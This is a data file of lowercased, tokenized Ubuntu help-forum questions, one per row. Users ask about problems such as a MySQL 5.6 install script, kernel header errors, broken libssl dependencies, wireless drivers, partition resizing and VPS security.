264513	install mysql 5.6 on ubuntu 12.10	i have created a script to automatically install mysql 5.6 on ubuntu server 12.10 ( 64bit ) . from all the information i gather i created the following script ( different functions that 's why you see multiple $ 1 , $ 2 , ect ) : apt-get install libaio1 -y groupadd mysql useradd -r -g $ 3 $ 1 # $ 1 = download url mysql ( http : //www.mysql.com/get/downloads/mysql-5.6/mysql-5.6.10-debian6.0-x86_64.deb/from/http : //cdn.mysql.com/ ) echo `` -starting mysql_install- '' wget $ 1 -o mysql-5.6.10-debian6.0-x86_64.deb dpkg -i mysql-5.6.10-debian6.0-x86_64.deb rm mysql-5.6.10-debian6.0-x86_64.deb # $ 1 = mysql root username # $ 2 = mysql root password # $ 3 = mysql group echo `` -starting mysql_config- '' cp /opt/mysql/server-5.6/support-files/mysql.server /etc/init.d/mysql.server cp /opt/mysql/server-5.6/support-files/my-default.cnf /etc/my.cnf cp /opt/mysql/server-5.6/support-files/mysql-log-rotate /etc/logrotate.d/mysql.server chmod +x /etc/init.d/mysql.server update-rc.d mysql.server defaults chown -r mysql /opt/mysql/server-5.6/ chgrp -r mysql /opt/mysql/server-5.6/ sed -i `` s/^ # basedir [ [ : blank : ] ] *= . */basedir = \/opt\/mysql\/server-5.6/ '' /etc/my.cnf sed -i `` s/^ # port [ [ : blank : ] ] *= . */port = 3360/ '' /etc/my.cnf echo -e `` lc-messages-dir = /opt/mysql/server-5.6/share '' > > /etc/my.cnf echo 'export path= $ path : /opt/mysql/server-5.6/bin ' | sudo tee /etc/profile.d/mysql.server.sh so far so good , but when i try to start mysql server with : service mysql.server start the following error message appears : starting mysql . * the server quit without updating pid file ( /opt/mysql/server-5.6/data/playfair01.pid ) . the directory were the pid file is stored did not exist . i created this directory and tried chrowning this folder without success : chown mysql : mysql /opt/mysql/server-5.6/data i have tried deleting temp files , pid files and lock file without success . is there anyone how had this similar issue and solved it ? or if someone has ideas how to fix this please share this information with me . many thanks , raoul
264514	how can i back-up my home without including previous back-ups ?	i 'm trying to create a backup of my home directory , but i want to exclude any previous backups that have been made already .
264516	flickering screen and off-set screen after second boot in wubi	i had this problem before with fedora and solved it by deleting random lines in the grub2 launch commands . this time i decided to use the wubi install of ubuntu . first boot was fine , but the second caused a massive amount of flickering and the screen was offset so high up i can only see about 5px of the bottom . i tried pressing ctrl+alt+f2 , but with the offset i have no idea what i 'm typing . i 'm fairly certain sudo dpkg-reconfigure xserver.xorg or nomodeset are the way to go . but how ? graphics card is radeon 6000hd series .
264518	remote desktop / file transfer pc to pc using ubuntu 12.04 as master with dhcp	i 'm new here , i need help on this following case as my job requires it . master - using this for field work brand/model : dell n7110 type : laptop interface : eth0 os : ubuntu 12.04 note : installed dhcp server client ( remote pc ) brand / model : hp mp8300 type : small form factor pc interface : lan os : windows 7 pro x86 ( 32-bit ) note : lan configured as automatically ( dhcp client ) connection type : cat5 crossover note : to avoid more load / hassle during travel , avoiding bringing some small switch . instead wanted just to carry laptop and cable only . been searching all over the internet / googling and tried their suggestions , though it fails and it does n't meet my expectations . i need to remotely full control and file transfer directly to lan interface of hp mp8300 windows 7 as client with my laptop dell n7110 ubuntu 12.04 as master via crossover cable cat5 . any software and step-by-step i need to consider ? so what do i do first ? thank you very much in advance .
264519	static ip address from xfce gui	i 'm interested in the iogear universal wi-fi n adapter as a wifi adapter . the fine manual states : installation without wps - mac step 1 : turn off your computer’s wireless connection ( if applicable ) and disconnect the ethernet cable currently connect to your computer ( if applicable ) . step 2 : use both the included rj-45 ethernet cable and the usb cable to connect the wifi adapter with your computer . step 3 : set your computer with a static ip address . a . open system preferences and select “network” . b . select your ethernet connection in the left pane . next change configure to manual and enter ip address 192.168.1.100 and subnet mask 255.255.255.0 . remove any entries in the router and dns boxes then click apply . step 4 : open your web browser and enter 192.168.1.252 . this will bring up the configuration utility . click “site survey” to scan for your wireless network . i 'm using xfce and would like to set the ip address as above with the gui : however , how do i know that the above setting is being utilized ? the ifconfig utility reports an ipv6 type address and no ipv4 information . i 'm a bit stuck between the gui showing data and that the cli seems to give a different result . how is the gui connected to ifconfig results ? it seems odd that ifconfig results do not match gui settings . ( it 's somewhat difficult to provide data as the computer this is happening on does not have internet access . ) i do not have many `` standard '' ubuntu options , only bare xfce . after typing in ifconfig eth0 down and then ifconfig eth0 up the result is an ipv6 type address .
264520	error ! your kernel headers for kernel 3.5.0-25-generic can not be found	i run dist-upgrade and i ended up with this error : error ! your kernel headers for kernel 3.5.0-25-generic can not be found . please install the linux-headers-3.5.0-25-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic` i have these installed dkms xserver-xorg xserver-xorg-core i have tried these questions unable to install virtualbox on ubuntu 12.10 : kernel headers can not be found and error : kernel headers not found . ( but they are in place ) but did n't help much here is the output below : suhaib @ suhaib-sda8 : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following new packages will be installed : linux-image-3.5.0-25-generic linux-image-extra-3.5.0-25-generic the following packages will be upgraded : linux-image-generic 1 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 39.6 mb of archives . after this operation , 153 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates/main linux-image-3.5.0-25-generic amd64 3.5.0-25.39 [ 11.9 mb ] get:2 http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates/main linux-image-extra-3.5.0-25-generic amd64 3.5.0-25.39 [ 27.7 mb ] get:3 http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates/main linux-image-generic amd64 3.5.0.25.31 [ 2,442 b ] fetched 39.6 mb in 13s ( 2,894 kb/s ) selecting previously unselected package linux-image-3.5.0-25-generic . ( reading database ... 142958 files and directories currently installed . ) unpacking linux-image-3.5.0-25-generic ( from ... /linux-image-3.5.0-25-generic_3.5.0-25.39_amd64.deb ) ... done . selecting previously unselected package linux-image-extra-3.5.0-25-generic . unpacking linux-image-extra-3.5.0-25-generic ( from ... /linux-image-extra-3.5.0-25-generic_3.5.0-25.39_amd64.deb ) ... preparing to replace linux-image-generic 3.5.0.17.19 ( using ... /linux-image-generic_3.5.0.25.31_amd64.deb ) ... unpacking replacement linux-image-generic ... setting up linux-image-3.5.0-25-generic ( 3.5.0-25.39 ) ... running depmod . ^ [ [ 1 ; 3b^ [ [ 1 ; 3bupdate-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic **error ! your kernel headers for kernel 3.5.0-25-generic can not be found . please install the linux-headers-3.5.0-25-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic** update-initramfs : generating /boot/initrd.img-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-25-generic found initrd image : /boot/initrd.img-3.5.0-25-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found ubuntu 12.10 ( 12.10 ) on /dev/sda6 found ubuntu 12.04.1 lts ( 12.04 ) on /dev/sda7 done setting up linux-image-extra-3.5.0-25-generic ( 3.5.0-25.39 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic error ! your kernel headers for kernel 3.5.0-25-generic can not be found . please install the linux-headers-3.5.0-25-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic update-initramfs : generating /boot/initrd.img-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-25-generic found initrd image : /boot/initrd.img-3.5.0-25-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found ubuntu 12.10 ( 12.10 ) on /dev/sda6 found ubuntu 12.04.1 lts ( 12.04 ) on /dev/sda7 done setting up linux-image-generic ( 3.5.0.25.31 ) ...
264523	how can i make ubuntu 12.04 read my mobile memory ?	how can i make ubuntu 12.04 read my mobile memory ? when i put it in my reader it does not read and i can not write on it . is there anyway to read it ?
264524	ca n't install new packages because of libssl broken dependencies	i ca n't install any new package either using apt-get or via the package manager . below is some output showing the error . please help ! pauldb @ pauldb-laptop : ~ $ sudo apt-get install reading package lists ... done building dependency tree reading state information ... done you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . libssl-dev : depends : libssl1.0.0 ( = 1.0.1-4ubuntu5.6 ) but 1.0.1-4ubuntu5.7 is installed e : unmet dependencies . try using -f. pauldb @ pauldb-laptop : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic python-support use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libssl-dev the following packages will be upgraded : libssl-dev 1 upgraded , 0 newly installed , 0 to remove and 45 not upgraded . 15 not fully installed or removed . need to get 0 b/1,525 kb of archives . after this operation , 12.3 kb disk space will be freed . do you want to continue [ y/n ] ? y e : internal error , no file name for libssl1.0.0 sudo apt-get update does n't fix the problem : pauldb @ pauldb-laptop : ~ $ sudo apt-get update [ sudo ] password for pauldb : ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-security inrelease ign http : //dl.google.com stable inrelease ign http : //extras.ubuntu.com precise inrelease get:1 http : //archive.ubuntu.com precise release.gpg [ 198 b ] get:2 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:3 http : //archive.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //dl.google.com stable release.gpg get:4 http : //extras.ubuntu.com precise release.gpg [ 72 b ] hit http : //extras.ubuntu.com precise release get:5 http : //archive.ubuntu.com precise release [ 49.6 kb ] hit http : //dl.google.com stable release hit http : //extras.ubuntu.com precise/main sources hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //dl.google.com stable/main amd64 packages get:6 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //extras.ubuntu.com precise/main translationindex ign http : //dl.google.com stable/main translationindex ign http : //linux.dropbox.com precise inrelease get:7 http : //linux.dropbox.com precise release.gpg [ 489 b ] get:8 http : //archive.ubuntu.com precise-security release [ 49.6 kb ] ign http : //extras.ubuntu.com precise/main translation-en_gb ign http : //extras.ubuntu.com precise/main translation-en get:9 http : //linux.dropbox.com precise release [ 2,603 b ] get:10 http : //archive.ubuntu.com precise/main sources [ 934 kb ] get:11 http : //linux.dropbox.com precise/main amd64 packages [ 1,148 b ] ign http : //linux.dropbox.com precise/main translationindex ign http : //dl.google.com stable/main translation-en_gb ign http : //dl.google.com stable/main translation-en ign http : //linux.dropbox.com precise/main translation-en_gb ign http : //linux.dropbox.com precise/main translation-en get:12 http : //archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:13 http : //archive.ubuntu.com precise/universe sources [ 5,019 kb ] get:14 http : //archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:15 http : //archive.ubuntu.com precise/main amd64 packages [ 1,273 kb ] get:16 http : //archive.ubuntu.com precise/restricted amd64 packages [ 8,452 b ] get:17 http : //archive.ubuntu.com precise/universe amd64 packages [ 4,786 kb ] get:18 http : //archive.ubuntu.com precise/multiverse amd64 packages [ 119 kb ] get:19 http : //archive.ubuntu.com precise/main translationindex [ 3,706 b ] get:20 http : //archive.ubuntu.com precise/multiverse translationindex [ 2,676 b ] get:21 http : //archive.ubuntu.com precise/restricted translationindex [ 2,596 b ] get:22 http : //archive.ubuntu.com precise/universe translationindex [ 2,922 b ] get:23 http : //archive.ubuntu.com precise-updates/main sources [ 368 kb ] get:24 http : //archive.ubuntu.com precise-updates/restricted sources [ 5,135 b ] get:25 http : //archive.ubuntu.com precise-updates/universe sources [ 79.3 kb ] get:26 http : //archive.ubuntu.com precise-updates/multiverse sources [ 4,729 b ] get:27 http : //archive.ubuntu.com precise-updates/main amd64 packages [ 584 kb ] get:28 http : //archive.ubuntu.com precise-updates/restricted amd64 packages [ 9,565 b ] get:29 http : //archive.ubuntu.com precise-updates/universe amd64 packages [ 182 kb ] get:30 http : //archive.ubuntu.com precise-updates/multiverse amd64 packages [ 9,436 b ] get:31 http : //archive.ubuntu.com precise-updates/main translationindex [ 3,564 b ] get:32 http : //archive.ubuntu.com precise-updates/multiverse translationindex [ 2,605 b ] get:33 http : //archive.ubuntu.com precise-updates/restricted translationindex [ 2,461 b ] get:34 http : //archive.ubuntu.com precise-updates/universe translationindex [ 2,850 b ] get:35 http : //archive.ubuntu.com precise-security/main sources [ 64.0 kb ] get:36 http : //archive.ubuntu.com precise-security/restricted sources [ 1,950 b ] get:37 http : //archive.ubuntu.com precise-security/universe sources [ 22.2 kb ] get:38 http : //archive.ubuntu.com precise-security/multiverse sources [ 1,388 b ] get:39 http : //archive.ubuntu.com precise-security/main amd64 packages [ 230 kb ] get:40 http : //archive.ubuntu.com precise-security/restricted amd64 packages [ 3,969 b ] get:41 http : //archive.ubuntu.com precise-security/universe amd64 packages [ 68.2 kb ] get:42 http : //archive.ubuntu.com precise-security/multiverse amd64 packages [ 2,188 b ] get:43 http : //archive.ubuntu.com precise-security/main translationindex [ 74 b ] get:44 http : //archive.ubuntu.com precise-security/multiverse translationindex [ 71 b ] get:45 http : //archive.ubuntu.com precise-security/restricted translationindex [ 71 b ] get:46 http : //archive.ubuntu.com precise-security/universe translationindex [ 73 b ] get:47 http : //archive.ubuntu.com precise/main translation-en_gb [ 96.4 kb ] get:48 http : //archive.ubuntu.com precise/main translation-en [ 726 kb ] get:49 http : //archive.ubuntu.com precise/multiverse translation-en_gb [ 79.8 kb ] get:50 http : //archive.ubuntu.com precise/multiverse translation-en [ 93.4 kb ] get:51 http : //archive.ubuntu.com precise/restricted translation-en_gb [ 2,406 b ] get:52 http : //archive.ubuntu.com precise/restricted translation-en [ 2,395 b ] get:53 http : //archive.ubuntu.com precise/universe translation-en_gb [ 5,492 b ] get:54 http : //archive.ubuntu.com precise/universe translation-en [ 3,341 kb ] get:55 http : //archive.ubuntu.com precise-updates/main translation-en_gb [ 96.4 kb ] get:56 http : //archive.ubuntu.com precise-updates/main translation-en [ 260 kb ] get:57 http : //archive.ubuntu.com precise-updates/multiverse translation-en_gb [ 79.8 kb ] get:58 http : //archive.ubuntu.com precise-updates/multiverse translation-en [ 5,694 b ] get:59 http : //archive.ubuntu.com precise-updates/restricted translation-en_gb [ 2,406 b ] get:60 http : //archive.ubuntu.com precise-updates/restricted translation-en [ 2,328 b ] get:61 http : //archive.ubuntu.com precise-updates/universe translation-en_gb [ 5,492 b ] get:62 http : //archive.ubuntu.com precise-updates/universe translation-en [ 108 kb ] get:63 http : //archive.ubuntu.com precise-security/main translation-en [ 112 kb ] get:64 http : //archive.ubuntu.com precise-security/multiverse translation-en [ 995 b ] get:65 http : //archive.ubuntu.com precise-security/restricted translation-en [ 978 b ] get:66 http : //archive.ubuntu.com precise-security/universe translation-en [ 43.2 kb ] fetched 19.2 mb in 1min 29s ( 214 kb/s ) reading package lists ... done pauldb @ pauldb-laptop : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic python-support use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libssl-dev the following packages will be upgraded : libssl-dev 1 upgraded , 0 newly installed , 0 to remove and 45 not upgraded . 15 not fully installed or removed . need to get 1,525 kb of archives . after this operation , 12.3 kb disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //archive.ubuntu.com/ubuntu/ precise-updates/main libssl-dev amd64 1.0.1-4ubuntu5.7 [ 1,525 kb ] fetched 1,525 kb in 7s ( 214 kb/s ) e : internal error , no file name for libssl1.0.0 pauldb @ pauldb-laptop : ~ $ contents of /etc/apt/sources.list : # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main
264525	problem with latex packages ubuntu 12.04	i 'm writing a latex document in texworks and i 'm having some problems with a couple of packages i 'm using in my file , amsrefs.sty and pcatcode.sty . for some reason texworks decided it did n't like those guys and stopped compiling . i tried updating texlive-latex-base and that did n't work . i then entered apt-file -x search '/pcatcode $ ' to find the directory the package lives in and i got /usr/share/texmf-texlive/tex/latex/amsrefs/pcatcode.sty . i tried cding into this directory , but i was told this directory does n't exist . i did the same thing for amsrefs.sty and got the same result .
264529	deja dup resolves host name incorrectly , adds isp hostname	problem : i backup to an ssh server via deja dup . recently i am recieving warnings that : my backups are for a computer called my_actual_hostname but the current computer is my_hostname.hawaii.rr.com . my questions are : how is deja dup resolving my hostname ? i have my hostname in /etc/hostname . python resolves the correct hostname with socket.getfqdn ( ) . where should i look to troubleshoot ? i have already reset my router to factory default . what could cause deja dup , or duplicity , to tack on my isps name to my computer name ?
264531	updated from 3.5.0-17 to 3.5.0-25 and lost my wireless	i wasusing kernel version 3.5.0-17 which is ok. then i updated the kernel by using dist-upgrade and restarted the laptop . which then showed me that i ca n't recognize the wirelss . why did that happen ? and how can i get my wireless driver back ? lspci : 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 )
264532	revert back to nouveau drivers	i was trying to install the proprietary nvidia drivers for my optimus laptop . this resulted in my gui disappearing , i can only see my desktop background ( can still open terminal and right-click the desktop to get into options ) . i have followed lots of tutorials that do n't result in any change . how can i switch back to the nouveau drivers that are already installed ? i have an nvidia 660m with optimus
264533	why is my ubuntu box shutting itself off ?	i just built a relatively cheap ubuntu box for use as a home server . i had a monster headache getting my win 8 machine to talk to it via samba , but this is beside the point . i 've now been attempting to transfer large amounts of media across the network to store on my home server and it keeps shutting itself off . i have set the `` when to suspend '' option in the power settings to `` never '' and it 's still doing it . it does n't even seem to offer any warning . it 's behind me right now as i type this post and i 'll just hear that `` power down '' sound ( all the fans spinning down , etc . ) and it 's off . when i turn it back on , it goes straight from post to the login screen , so i 'm guessing this is some manner of suspend/hibernate behavior . and ... it just did it again . this is getting really frustrating . anybody know of anything else i can check ? i 'm praying it is n't a hardware failure . i just bought the stuff .
264539	using remmina with vpn	i 've been looking for a way to use remmina over a vpn connection which i have already configured . vpn connection works properly , but i 'd like to remotely access the windows computer in a lab , and would like to use remmina . could somebody give/link me a step-by-step tutorial for doing so ? thank you
264544	what features should i check on my vps in order to have a secure box ?	i have a vps with ubuntu 12.10 server edition , an i connect to it from public/university . i host some web applications on it . i have always been concerned with security issues . what features is needed to be checked in order to have a secure vps ?
264549	vim - up-down line movements the cursor changes column position	while editing a simple text file where every line is nearly to the end of screen , i was expecting vim to retain the column position as i used j and k to move up and down . surprisingly , it does not happen . i am using a default install of vim on ubuntu 12.10 and a few plugins ( unicycle , speeddating , tex , align , alignmaps , genutils , html , foldutil , scratch , surround ) . the behaviour i am referring to is : i am in c57-l5 . line 6 is 80 characters long . i hit j , cursor jumps to c1-l6 instead of c57-l6 . what could be wrong ? how can i set it right ?
264551	reallocating free space from one partition to another	im running ubuntu oneiric server edition . the computer has 2 hard drives . on my storage drive i have 2 partitions both are ext4 and i 'm trying to reallocate space from a larger one to a smaller one without rebooting . this is what the second storage drive looks like . device boot start end blocks id system /dev/sdb1 2048 110102527 55050240 83 linux /dev/sdb2 110102528 976773167 433335320 5 extended /dev/sdb5 110104576 120590335 5242880 83 linux /dev/sdb6 120592384 976773167 428090392 83 linux how do i safely reallocate free space from /dev/sdb6 to /dev/sdb1 without using a boot cd ? edit : this is a secondary drive so i can unmount it if necessary .
264552	300 mbps on atheros chip	i can not get speed higher than 150mbps . my card seems to support ht40 and my asus router have it enabled . what can i do to enable 300mbps ? iphy phy0 band 1 : capabilities : 0x11ce ht20/ht40 sm power save disabled rx ht40 sgi tx stbc rx stbc 1-stream max amsdu length : 3839 bytes dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 8 usec ( 0x06 ) ht tx/rx mcs rate indexes supported : 0-7 frequencies : * 2412 mhz [ 1 ] ( 16.0 dbm ) * 2417 mhz [ 2 ] ( 16.0 dbm ) * 2422 mhz [ 3 ] ( 16.0 dbm ) * 2427 mhz [ 4 ] ( 16.0 dbm ) * 2432 mhz [ 5 ] ( 16.0 dbm ) * 2437 mhz [ 6 ] ( 16.0 dbm ) * 2442 mhz [ 7 ] ( 16.0 dbm ) * 2447 mhz [ 8 ] ( 16.0 dbm ) * 2452 mhz [ 9 ] ( 16.0 dbm ) * 2457 mhz [ 10 ] ( 16.0 dbm ) * 2462 mhz [ 11 ] ( 16.0 dbm ) * 2467 mhz [ 12 ] ( 16.0 dbm ) ( passive scanning ) * 2472 mhz [ 13 ] ( 16.0 dbm ) ( passive scanning ) * 2484 mhz [ 14 ] ( 17.0 dbm ) ( passive scanning ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps max # scan ssids : 4 max scan ies length : 2257 bytes coverage class : 0 ( up to 0m ) supported ciphers : * wep40 ( 00-0f-ac:1 ) * wep104 ( 00-0f-ac:5 ) * tkip ( 00-0f-ac:2 ) * ccmp ( 00-0f-ac:4 ) * cmac ( 00-0f-ac:6 ) available antennas : tx 0x1 rx 0x1 configured antennas : tx 0x1 rx 0x1 supported interface modes : * ibss * managed * ap * ap/vlan * wds * monitor * mesh point * p2p-client * p2p-go software interface modes ( can always be added ) : * ap/vlan * monitor valid interface combinations : * # { managed , wds , p2p-client } < = 2048 , # { ap , mesh point , p2p-go } < = 8 , total < = 2048 , # channels < = 1 supported commands : * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * join_mesh * remain_on_channel * set_tx_bitrate_mask * action * frame_wait_cancel * set_wiphy_netns * set_channel * set_wds_peer * unknown command ( 82 ) * unknown command ( 81 ) * unknown command ( 84 ) * unknown command ( 87 ) * unknown command ( 85 ) * testmode * connect * disconnect supported tx frame types : * ibss : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * managed : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * ap : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * ap/vlan : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * mesh point : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * p2p-client : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * p2p-go : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 supported rx frame types : * ibss : 0xb0 0xc0 0xd0 * managed : 0x40 0xd0 * ap : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * ap/vlan : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * mesh point : 0xb0 0xc0 0xd0 * p2p-client : 0x40 0xd0 * p2p-go : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 device supports rsn-ibss . wowlan support : * wake up on disconnect * wake up on magic packet * wake up on pattern match , up to 6 patterns of 1-256 bytes ht capability overrides : * mcs : ff ff ff ff ff ff ff ff ff ff * maximum a-msdu length * supported channel width * short gi for 40 mhz * max a-mpdu length exponent * min mpdu start spacing device supports tx status socket option . device supports ht-ibss .
264554	unity dash has incorrect search results	after messing around with drivers for a bit , my unity plugin from compiz became disabled and i had to turn it back on . after that happened , my dash started giving me weird responses to my searches . in the first image , 'geany ' should be the first search result , but is not even in the list . in the second picture , secpanel should be this first , but is a row and a half down . can anyone help me find a solution to this problem ? it was fine before the unity plugin became disabled .
264555	ubuntu 12.04 - touchpad not working	i installed the 64-bit ubuntu 12.04 on my hp pavilion laptop , but the touchpad is n't working . i 've already tried reinstalling , so that wo n't fix it . i 've managed to get the terminal open using ctrl+alt+t , but i do n't know what i 'm doing . so can someone help me with this ?
264558	how to complete unfinished installation in ubuntu 10.04 ?	hi i have installed ubuntu 10.04 on my desktop . after installing i kept some softwares to install using ubuntu software center and while it was installing the power went and i hibernated the system . my problem is that when i came back and tried to reinstall the applications it didnot work and now am unable to reinstall the softwares and also can not uninstall the softwares can any one tell me how to fix this as i am new to ubuntu .
264563	installing google go in ubuntu	can google go be installed on ubuntu ? i want start to test these tools and it will be great if i could . thanks in advance .
264565	where are the lucidatypewriter fonts ?	in older ubuntu versions and older x11s in general , there used to be the fonts -b & h-lucidatypewriter-* ... i have installed xfonts-base , xfonts-75dpi , xfonts-100dpi but still i can not find any matching font with xfontsel or xlsfonts . to be sure : i want the bitmap fonts .
264567	how to install rndis driver	i am trying reverse tethering on my samsung device but i ca n't find how to install rndis driver to do so . can someone help me on this please ?
